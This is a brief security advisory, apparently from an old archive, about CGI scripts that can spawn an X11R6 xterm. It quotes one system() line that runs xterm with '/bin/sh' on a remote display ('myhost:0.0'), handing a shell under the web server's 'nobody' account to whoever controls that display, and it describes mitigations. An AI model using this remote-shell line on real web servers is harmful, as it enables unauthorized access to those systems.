COMMAND

    /usr/local/X11R6/bin/xterm

SYSTEMS AFFECTED

    X11R6

PROBLEM

    What if we have a cgi script which does the following:

        system("/usr/local/X11R6/bin/xterm -display myhost:0.0 -e /bin/sh&")

    We can now pop  an exterm on my  display as nobody.   This way any
    user can gain access to the nobody account and have fun with it...

SOLUTION

    The solution is to run CGI scripts as the user's UID, rather than
    as the server's UID.  Until the most recent beta of Apache, you
    had to do this with "wrapper" programs that are setuid root and
    written carefully.

    You cannot solve the problem by simply removing execute permission
    from "xterm", since  a user can  trivially copy their  own "xterm"
    binary and run that as the server.

    Another solution is simple not do it, but explain that to guys :-)